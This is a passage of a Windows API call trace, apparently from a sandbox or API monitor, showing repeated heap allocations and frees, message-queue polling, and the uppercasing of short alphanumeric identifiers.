(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0101.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0101.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.884] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b30 [0101.884] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0101.884] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0101.884] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0101.884] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.885] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74118 [0101.885] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0101.885] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0101.885] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0101.885] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74118 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0101.886] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.887] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.887] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a58 [0101.887] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0101.887] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0101.887] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0101.887] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: 